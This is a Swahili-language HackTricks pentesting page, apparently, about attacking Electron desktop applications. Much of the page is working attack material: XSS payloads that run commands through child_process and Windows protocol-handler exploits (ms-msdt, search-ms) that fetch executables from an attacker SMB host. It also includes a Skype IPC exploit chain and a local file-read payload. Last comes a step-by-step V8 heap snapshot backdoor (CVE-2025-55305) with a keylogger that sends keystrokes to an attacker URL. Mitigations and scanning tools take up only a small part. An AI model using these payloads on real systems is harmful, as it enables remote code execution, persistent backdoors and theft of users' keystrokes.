Programu za Desktop za Electron
Reading time: 20 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na š¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter š¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Utangulizi
Electron huunganisha backend ya ndani (ikiwa na NodeJS) na frontend (Chromium), ingawa ina upungufu wa baadhi ya mifumo ya usalama ya vivinjari vya kisasa.
Mara nyingi unaweza kupata msimbo wa app ya electron ndani ya programu ya .asar
; ili kupata msimbo unahitaji kuutoa:
npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file
Katika msimbo wa chanzo wa app ya Electron, ndani ya packet.json
, unaweza kupata faili main.js
iliyobainishwa ambapo mipangilio ya usalama imewekwa.
{
"name": "standard-notes",
"main": "./app/index.js",
Electron ina aina mbili za mchakato:
- Main Process (ina ufikiaji kamili wa NodeJS)
- Renderer Process (inapaswa kuwa na ufikiaji mdogo wa NodeJS kwa sababu za usalama)
Mchakato wa renderer process utakuwa dirisha la kivinjari linalopakia faili:
const { BrowserWindow } = require("electron")
let win = new BrowserWindow()
//Open Renderer Process
win.loadURL(`file://path/to/index.html`)
Mipangilio ya renderer process yanaweza kusanidiwa katika main process ndani ya faili main.js. Baadhi ya mipangilio yatazuia programu ya Electron kupata RCE au udhaifu mwingine ikiwa mipangilio imewekwa ipasavyo.
Programu ya Electron inaweza kufikia kifaa kupitia Node apis ingawa inaweza kusanidiwa kuizuia:
nodeIntegration
- kwa chaguo-msingi nioff
. Ikiwaon
, inaruhusu kufikia vipengele vya Node kutoka kwenye renderer process.contextIsolation
- kwa chaguo-msingi nion
. Ikiwaoff
, main na renderer processes hazitenganishwi.preload
- tupu kwa chaguo-msingi.sandbox
- kwa chaguo-msingi nioff
. Itazuia vitendo ambavyo NodeJS inaweza kufanya.- Node Integration in Workers
nodeIntegrationInSubframes
- kwa chaguo-msingi nioff
.- Ikiwa
nodeIntegration
imewezeshwa, hii itaruhusu matumizi ya Node.js APIs katika kurasa za wavuti zinazopakiwa ndani ya iframes ndani ya programu ya Electron. - Ikiwa
nodeIntegration
imezimwa, basi preloads zitaanzishwa ndani ya iframe
Mfano wa usanidi:
const mainWindowOptions = {
title: "Discord",
backgroundColor: getBackgroundColor(),
width: DEFAULT_WIDTH,
height: DEFAULT_HEIGHT,
minWidth: MIN_WIDTH,
minHeight: MIN_HEIGHT,
transparent: false,
frame: false,
resizable: true,
show: isVisible,
webPreferences: {
blinkFeatures: "EnumerateDevices,AudioOutputDevices",
nodeIntegration: false,
contextIsolation: false,
sandbox: false,
nodeIntegrationInSubFrames: false,
preload: _path2.default.join(__dirname, "mainScreenPreload.js"),
nativeWindowOpen: true,
enableRemoteModule: false,
spellcheck: true,
},
}
Baadhi ya RCE payloads kutoka here:
Example Payloads (Windows):
<img
src="x"
onerror="alert(require('child_process').execSync('calc').toString());" />
Example Payloads (Linux & MacOS):
<img
src="x"
onerror="alert(require('child_process').execSync('gnome-calculator').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('id').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('ls -l').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('uname -a').toString());" />
Kukamata trafiki
Badilisha usanidi wa start-main na ongeza matumizi ya proxy kama:
"start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",
Electron Local Code Injection
Ikiwa unaweza kuendesha Electron App ndani ya mashine yako, inawezekana kwamba unaweza kuifanya itekeleze arbitrary javascript code. Angalia jinsi katika:
macOS Electron Applications Injection
RCE: XSS + nodeIntegration
Ikiwa nodeIntegration imewekwa kuwa on, JavaScript ya ukurasa wa wavuti inaweza kutumia vipengele vya Node.js kwa urahisi kwa kupiga tu require()
. Kwa mfano, njia ya kuendesha application ya calc kwenye Windows ni:
<script>
require("child_process").exec("calc")
// or
top.require("child_process").exec("open /System/Applications/Calculator.app")
</script>
.png)
RCE: preload
Script iliyotajwa katika mpangilio huu ni imepakuliwa kabla ya scripts nyingine katika renderer, hivyo ina ufikiaji usio na kikomo kwa Node APIs:
new BrowserWindow{
webPreferences: {
nodeIntegration: false,
preload: _path2.default.join(__dirname, 'perload.js'),
}
});
Kwa hivyo, script inaweza ku-export node-features kwa pages:
typeof require === "function"
window.runCalc = function () {
require("child_process").exec("calc")
}
<body>
<script>
typeof require === "undefined"
runCalc()
</script>
</body>
[!NOTE] > Ikiwa
contextIsolation
imewezeshwa, hii haitafanya kazi
RCE: XSS + contextIsolation
contextIsolation huanzisha muktadha tofauti kati ya scripts za ukurasa wa wavuti na code ya ndani ya Electron ili utekelezaji wa JavaScript wa kila code usiathiriane. Hii ni sifa muhimu kuondoa uwezekano wa RCE.
Kama muktadha haukutengwa, mshambuliaji anaweza:
- Endesha JavaScript yoyote katika renderer (XSS au kuvinjari kwenda tovuti za nje)
- Kuandika upya built-in method ambayo inatumiwa katika preload au Electron internal code ili kudhibiti function
- Kusababisha matumizi ya function iliyooandikwa upya
- RCE?
Kuna sehemu 2 ambapo built-int methods zinaweza kuandikwa upya: Katika preload code au katika Electron internal code:
Electron contextIsolation RCE via preload code
Electron contextIsolation RCE via Electron internal code
Electron contextIsolation RCE via IPC
Bypass click event
Kama kuna vizuizi vinavyotumika unapobofya link unaweza kuvipita kwa kubofya kwa kitufe cha katikati (middle click) badala ya bofya la kushoto la kawaida
window.addEventListener('click', (e) => {
RCE via shell.openExternal
Kwa taarifa zaidi kuhusu mifano hii angalia https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8 na https://benjamin-altpeter.de/shell-openexternal-dangers/
Wakati wa kupeleka programu ya desktop ya Electron, kuhakikisha mipangilio sahihi ya nodeIntegration
na contextIsolation
ni muhimu. Imebainishwa kwamba client-side remote code execution (RCE) inayolenga preload scripts au native code ya Electron kutoka main process inadhibitiwa kwa ufanisi ikiwa mipangilio hii imewekwa.
Wakati mtumiaji anapotumia viungo au kufungua madirisha mapya, wasikilizaji maalum wa matukio huanzishwa, ambayo ni muhimu kwa usalama na utendakazi wa programu:
webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}
Wasikilizaji hawa wanabadilishwa na programu ya desktop ili kutekeleza mantiki ya biashara yake. Programu huchunguza kama kiungo kilichofunguliwa kinapaswa kufunguliwa ndani ya programu au katika kivinjari cha wavuti cha nje. Uamuzi huu kawaida hufanywa kupitia function, openInternally
. Ikiwa function hii inarudisha false
, inaonyesha kwamba kiungo kinapaswa kufunguliwa nje, kwa kutumia function shell.openExternal
.
Hapa kuna pseudocode iliyorahishwa:
Electron JS security best practices yanapendekeza kutoikubali content isiyo ya kuaminika kwa kutumia openExternal
, kwani inaweza kusababisha RCE kupitia protocols mbalimbali. Systems za uendeshaji zinaunga mkono protocols tofauti ambazo zinaweza kusababisha RCE. Kwa mifano ya kina na maelezo zaidi juu ya mada hii, unaweza kurejea rasilimali hii, ambayo inajumuisha Windows protocol examples zinazoweza kutumiwa ku-exploit ugumu huu.
Katika macos, function ya openExternal
inaweza kutumika vibaya kutekeleza amri yoyote kama katika shell.openExternal('file:///System/Applications/Calculator.app')
.
Mifano ya Windows protocol exploits ni pamoja na:
<script>
window.open(
"ms-msdt:id%20PCWDiagnostic%20%2Fmoreoptions%20false%20%2Fskip%20true%20%2Fparam%20IT_BrowseForFile%3D%22%5Cattacker.comsmb_sharemalicious_executable.exe%22%20%2Fparam%20IT_SelectProgram%3D%22NotListed%22%20%2Fparam%20IT_AutoTroubleshoot%3D%22ts_AUTO%22"
)
</script>
<script>
window.open(
"search-ms:query=malicious_executable.exe&crumb=location:%5C%5Cattacker.com%5Csmb_share%5Ctools&displayname=Important%20update"
)
</script>
<script>
window.open(
"ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResult%22:%7B%22details%22:%7B%22appId%22:5,%22name%22:%22Teams%22,%22discovered%22:%7B%22command%22:%22teams.exe%22,%22uri%22:%22msteams%22%7D%7D,%22filename%22:%22a:/b/%2520--disable-gpu-sandbox%2520--gpu-launcher=%22C:%5CWindows%5CSystem32%5Ccmd%2520/c%2520ping%252016843009%2520&&%2520%22%22%7D%7D"
)
</script>
RCE: webviewTag + preload IPC dhaifu + shell.openExternal
Udhaifu huu unaweza kupatikana katika this report.
The webviewTag ni sifa iliyokataliwa inayoruhusu matumizi ya NodeJS katika renderer process, ambayo inapaswa kuzimwa kwa kuwa inaruhusu kupakia script ndani ya preload context kama:
<webview src="https://example.com/" preload="file://malicious.example/test.js"></webview>
Kwa hivyo, mshambuliaji anayefanikiwa kupakia ukurasa wowote anaweza kutumia tag hiyo ili kupakia preload script yoyote.
Preload script hii ilitumiwa vibaya kisha kuitisha vulnerable IPC service (skype-new-window
) ambayo ilikuwa ikiita shell.openExternal
ili kupata RCE:
(async() => {
const { ipcRenderer } = require("electron");
await ipcRenderer.invoke("skype-new-window", "https://example.com/EXECUTABLE_PATH");
setTimeout(async () => {
const username = process.execPath.match(/C:\\Users\\([^\\]+)/);
await ipcRenderer.invoke("skype-new-window", `file:///C:/Users/${username[1]}/Downloads/EXECUTABLE_NAME`);
}, 5000);
})();
Kusoma Faili za Ndani: XSS + contextIsolation
Kuzima contextIsolation
kunaruhusu matumizi ya <webview>
tags, sawa na <iframe>
, kwa kusoma na exfiltrating faili za ndani. Mfano ulioonyeshwa unaonyesha jinsi ya kutumia udhaifu huu kusoma yaliyomo ya faili za ndani:
Zaidi ya hayo, njia nyingine ya kusoma faili ya ndani imewasilishwa, ikionyesha udhaifu muhimu wa kusoma faili za ndani katika Electron desktop app. Hii inahusisha kuingiza script ili kuitumia application na exfiltrate data:
<br /><br /><br /><br />
<h1>
pwn<br />
<iframe onload="j()" src="/etc/hosts">xssxsxxsxs</iframe>
<script type="text/javascript">
function j() {
alert(
"pwned contents of /etc/hosts :\n\n " +
frames[0].document.body.innerText
)
}
</script>
</h1>
RCE: XSS + Old Chromium
Ikiwa chromium inayotumiwa na programu ni zamani na kuna vulnerabilities zilizojulikana ndani yake, inaweza kuwa inawezekana kuitumia na kupata RCE kupitia XSS.\
Unaweza kuona mfano katika writeup hii: https://blog.electrovolt.io/posts/discord-rce/
XSS Phishing via Internal URL regex bypass
Iwapo umetambua XSS lakini huwezi kusababisha RCE au kuiba faili za ndani, unaweza kujaribu kuitumia kuiba credentials kupitia phishing.
Kwanza kabisa unahitaji kujua kinachotokea unapojaribu kufungua URL mpya, ukiangalia code ya JS katika front-end:
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
Wito wa openInternally
utaamua ikiwa link itafunguliwa katika desktop window kama ni link inayomilikiwa na platform, au itafunguliwa katika browser kama 3rd party resource.
Katika kesi ambapo regex inayotumiwa na function ni nyeti kwa bypasses (kwa mfano kwa kutokutoa escape kwa dots za subdomains) mshambuliaji anaweza kutumia XSS kufungua dirisha jipya ambalo litakuwa kwenye miundombinu ya mshambuliaji litaomba vigezo vya kuingia kwa mtumiaji:
<script>
window.open("<http://subdomainagoogleq.com/index.html>")
</script>
file://
Protokoli
Kama ilivyotajwa katika the docs kurasa zinazoendeshwa kwa file://
zina ufikiaji wa upande mmoja kwa kila faili kwenye mashine yako, ikimaanisha kwamba masuala ya XSS yanaweza kutumika kupakia faili za aina yoyote kutoka kwenye mashine ya mtumiaji. Kutumia protokoli maalum kunazuia matatizo kama haya kwa sababu unaweza kupunguza protokoli ili kutoa tu seti maalum ya faili.
Moduli ya Remote
Moduli ya Remote ya Electron inaruhusu mchakato za renderer kufikia API za mchakato mkuu, ikirahisisha mawasiliano ndani ya programu ya Electron. Hata hivyo, kuamilisha moduli hii kunaweka hatari kubwa za usalama. Inapanua uso wa shambulio la programu, na kuifanya iwe nyeti zaidi kwa udhaifu kama cross-site scripting (XSS) attacks.
tip
Ingawa moduli ya remote inaonyesha baadhi ya API kutoka mchakato mkuu hadi mchakato za renderer, sio rahisi kupata RCE kwa kumeza tu komponenti hizi. Hata hivyo, komponenti zinaweza kufichua taarifa nyeti.
warning
Programu nyingi ambazo bado zinatumia moduli ya remote hufanya hivyo kwa njia inayohitaji NodeIntegration iwe imewezeshwa katika mchakato wa renderer, jambo ambalo ni hatari kubwa ya usalama.
Tangu Electron 14, moduli ya remote
ya Electron inaweza kuwa imewezishwa kwa hatua kadhaa; kutokana na sababu za usalama na utendaji, inashauriwa kutoitumia.
Ili kuiwezesha, kwanza inahitajika kuiwezesha katika mchakato mkuu:
const remoteMain = require('@electron/remote/main')
remoteMain.initialize()
[...]
function createMainWindow() {
mainWindow = new BrowserWindow({
[...]
})
remoteMain.enable(mainWindow.webContents)
Kisha, mchakato wa renderer unaweza kuingiza vitu kutoka kwenye module kama ifuatavyo:
import { dialog, getCurrentWindow } from '@electron/remote'
Mchapisho wa blog post unaonyesha baadhi ya functions za kuvutia zinazotolewa na object app
kutoka kwa remote module:
app.relaunch([options])
- Inazindua upya programu kwa kuexit instance ya sasa na kuanzisha mpya. Inafaa kwa app updates au mabadiliko makubwa ya state.
app.setAppLogsPath([path])
- Huweka au huunda saraka kwa ajili ya kuhifadhi app logs. Logs zinaweza kutolewa au kubadilishwa kwa kutumia
app.getPath()
auapp.setPath(pathName, newPath)
. app.setAsDefaultProtocolClient(protocol[, path, args])
- Inasajili executable ya sasa kama default handler kwa protocol maalum. Unaweza kutoa custom path na arguments ikiwa zinahitajika.
app.setUserTasks(tasks)
- Inaongeza tasks kwenye Tasks category katika Jump List (Windows). Kila task inaweza kudhibiti jinsi app inavyofunguliwa (launched) au ni arguments gani zinapitishwa.
app.importCertificate(options, callback)
- Inaingiza PKCS#12 certificate kwenye certificate store ya mfumo (Linux tu). Callback inaweza kutumika kushughulikia matokeo.
app.moveToApplicationsFolder([options])
- Inahamisha programu kwenye Applications folder (macOS). Husaidia kuhakikisha standard installation kwa watumiaji wa Mac.
app.setJumpList(categories)
- Inatengeneza au inaondoa custom Jump List kwenye Windows. Unaweza kuainisha categories kupanga jinsi tasks zinavyoonekana kwa mtumiaji.
app.setLoginItemSettings(settings)
- Inabainisha executable zipi zinaanza wakati wa login pamoja na options zao (macOS na Windows tu).
Example:
Native.app.relaunch({args: [], execPath: "/System/Applications/Calculator.app/Contents/MacOS/Calculator"});
Native.app.exit()
systemPreferences module
API kuu kwa kufikia mipangilio ya mfumo na kutoa matukio ya mfumo katika Electron. Mbinu kama subscribeNotification, subscribeWorkspaceNotification, getUserDefault, na setUserDefault zote ni sehemu ya moduli hii.
Mfano wa matumizi:
const { systemPreferences } = require('electron');
// Subscribe to a specific notification
systemPreferences.subscribeNotification('MyCustomNotification', (event, userInfo) => {
console.log('Received custom notification:', userInfo);
});
// Get a user default key from macOS
const recentPlaces = systemPreferences.getUserDefault('NSNavRecentPlaces', 'array');
console.log('Recent Places:', recentPlaces);
subscribeNotification / subscribeWorkspaceNotification
- Husikiliza arifa za asili za macOS kwa kutumia NSDistributedNotificationCenter.
- Kabla ya macOS Catalina, ulikuwa unaweza sniff arifa zote zilizosambazwa kwa kutuma nil kwa CFNotificationCenterAddObserver.
- Baada ya Catalina / Big Sur, sandboxed apps bado zinaweza subscribe kwa matukio mengi (kwa mfano, screen locks/unlocks, volume mounts, network activity, n.k.) kwa kujiandikisha arifa kwa jina.
getUserDefault / setUserDefault
-
Inashirikiana na NSUserDefaults, ambayo huhifadhi mapendeleo ya application au global kwenye macOS.
-
getUserDefault inaweza kutoa taarifa nyeti, kama eneo la faili za hivi karibuni au eneo la kijiografia la mtumiaji.
-
setUserDefault inaweza kubadilisha mapendeleo haya, na hivyo kuathiri configuration ya app.
-
Katika matoleo ya zamani ya Electron (kabla ya v8.3.0), tu standard suite ya NSUserDefaults ilikuwa inapatikana.
Shell.showItemInFolder
Kazi hii inaonyesha faili iliyotolewa katika file manager, ambayo inaweza kutekeleza faili hiyo moja kwa moja.
For more information check https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html
Content Security Policy
Programu za Electron zinapaswa kuwa na Content Security Policy (CSP) ili kuzuia XSS attacks. CSP ni standard ya usalama inayosaidia kuzuia utekelezaji wa untrusted code katika browser.
Kwa kawaida hupangwa katika faili ya main.js au katika kiolezo cha index.html na CSP ndani ya meta tag.
For more information check:
Content Security Policy (CSP) Bypass
Tools
- Electronegativity ni zana ya kubaini misconfigurations na security anti-patterns katika applications zinazotegemea Electron.
- Electrolint ni plugin ya VS Code open source kwa applications za Electron inayotumia Electronegativity.
- nodejsscan kwa kuangalia third-party libraries zilizo vulnerable
- Electro.ng: Unahitaji kununua
Maabara
In https://www.youtube.com/watch?v=xILfQGkLXQo&t=22s unaweza kupata maabara ili exploit vulnerable Electron apps.
Baadhi ya amri zitakazokusaidia katika maabara:
# Download apps from these URls
# Vuln to nodeIntegration
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable1.zip
# Vuln to contextIsolation via preload script
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable2.zip
# Vuln to IPC Rce
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable3.zip
# Get inside the electron app and check for vulnerabilities
npm audit
# How to use electronegativity
npm install @doyensec/electronegativity -g
electronegativity -i vulnerable1
# Run an application from source code
npm install -g electron
cd vulnerable1
npm install
npm start
Local backdooring via V8 heap snapshot tampering (Electron/Chromium) ā CVE-2025-55305
Apps za Electron na zinazotegemea Chromium deserialize a prebuilt V8 heap snapshot at startup (v8_context_snapshot.bin, and optionally browser_v8_context_snapshot.bin) to initialize each V8 isolate (main, preload, renderer). Kihistoria, Electronās integrity fuses did not treat these snapshots as executable content, so they escaped both fuse-based integrity enforcement and OS code-signing checks. Kwa matokeo, kubadilisha snapshot katika usakinishaji unaoweza kuandikwa na mtumiaji kulitoa utekelezaji wa code wa kisiri, wa kudumu ndani ya app bila kuharibu the signed binaries au ASAR.
Key points
- Integrity gap: EnableEmbeddedAsarIntegrityValidation and OnlyLoadAppFromAsar validate app JavaScript inside the ASAR, but they did not cover V8 heap snapshots (CVE-2025-55305). Chromium similarly does not integrity-check snapshots.
- Attack preconditions: Local file write into the appās installation directory. Hii ni kawaida kwenye systems ambapo Electron apps au Chromium browsers zimewekwa under user-writable paths (e.g., %AppData%\Local on Windows; /Applications with caveats on macOS).
- Effect: Reliable execution of attacker JavaScript in any isolate by clobbering a frequently used builtin (a āgadgetā), enabling persistence and evasion of code-signing verification.
- Affected surface: Electron apps (even with fuses enabled) and Chromium-based browsers that load snapshots from user-writable locations.
Generating a malicious snapshot without building Chromium
- Use the prebuilt electron/mksnapshot to compile a payload JS into a snapshot and overwrite the applicationās v8_context_snapshot.bin.
Example wa payload ndogo (thibitisha uteklezaji kwa kulazimisha crash)
// Build snapshot from this payload
// npx -y electron-mksnapshot@37.2.6 "/abs/path/to/payload.js"
// Replace the applicationās v8_context_snapshot.bin with the generated file
const orig = Array.isArray;
// Use Array.isArray as a ubiquitous gadget
Array.isArray = function () {
// Executed whenever the app calls Array.isArray
throw new Error("testing isArray gadget");
};
Isolate-aware payload routing (run different code in main vs. renderer)
- Utambuzi wa main process: Node-only globals kama process.pid, process.binding(), au process.dlopen zipo katika main process isolate.
- Utambuzi wa browser/renderer: Browser-only globals kama alert zinapatikana wakati zikiendeshwa katika muktadha wa dokumenti.
Mfano wa gadget inayochunguza uwezo wa Node wa main-process mara moja
const orig = Array.isArray;
Array.isArray = function() {
// Defer until we land in main (has Node process)
try {
if (!process || !process.pid) {
return orig(...arguments);
}
} catch (_) {
return orig(...arguments);
}
// Run once
if (!globalThis._invoke_lock) {
globalThis._invoke_lock = true;
console.log('[payload] isArray hook started ...');
// Capability probing in main
console.log(`[payload] unconstrained fetch available: [${fetch ? 'y' : 'n'}]`);
console.log(`[payload] unconstrained fs available: [${process.binding('fs') ? 'y' : 'n'}]`);
console.log(`[payload] unconstrained spawn available: [${process.binding('spawn_sync') ? 'y' : 'n'}]`);
console.log(`[payload] unconstrained dlopen available: [${process.dlopen ? 'y' : 'n'}]`);
process.exit(0);
}
return orig(...arguments);
};
Renderer/browser-context data theft PoC (kwa mfano Slack)
const orig = Array.isArray;
Array.isArray = function() {
// Wait for a browser context
try {
if (!alert) {
return orig(...arguments);
}
} catch (_) {
return orig(...arguments);
}
if (!globalThis._invoke_lock) {
globalThis._invoke_lock = true;
setInterval(() => {
window.onkeydown = (e) => {
fetch('http://attacker.tld/keylogger?q=' + encodeURIComponent(e.key), {mode: 'no-cors'})
}
}, 1000);
}
return orig(...arguments);
};
Mtiririko wa operator
- Andika payload.js inayobadilisha builtin ya kawaida (mfano, Array.isArray) na hiari itumie matawi kwa kila isolate.
- Jenga snapshot bila vyanzo vya Chromium:
- npx -y electron-mksnapshot@37.2.6 "/abs/path/to/payload.js"
- Funika faili za snapshot za programu lengwa:
- v8_context_snapshot.bin (always used)
- browser_v8_context_snapshot.bin (if the LoadBrowserProcessSpecificV8Snapshot fuse is used)
- Anzisha programu; gadget itatekelezwa kila wakati builtin iliyochaguliwa inapoitwa.
Vidokezo na mambo ya kuzingatia
- Integrity/signature bypass: Snapshot files are not treated as native executables by code-signing checks and (historically) were not covered by Electronās fuses or Chromium integrity controls.
- Uendelevu: Kubadilisha snapshot katika usakinishaji unaoweza kuandikwa na mtumiaji kwa kawaida hufanikiwa kuhimili anzisho upya za app na inaonekana kama app iliyotiwa saini na halali.
- Chromium browsers: The same tampering concept applies to Chrome/derivatives installed in user-writable locations. Chrome has other integrity mitigations but explicitly excludes physically local attacks from its threat model.
Ugundaji na hatua za kupunguza
- Treat snapshots as executable content and include them in integrity enforcement (CVE-2025-55305 fix).
- Prefer admin-writable-only install locations; baseline and monitor hashes for v8_context_snapshot.bin and browser_v8_context_snapshot.bin.
- Detect early-runtime builtin clobbering and unexpected snapshot changes; alert when deserialized snapshots do not match expected values.
Marejeo
-
https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028
-
https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d
-
More researches and write-ups about Electron security in https://github.com/doyensec/awesome-electronjs-hacking
-
https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81
-
https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na š¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter š¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.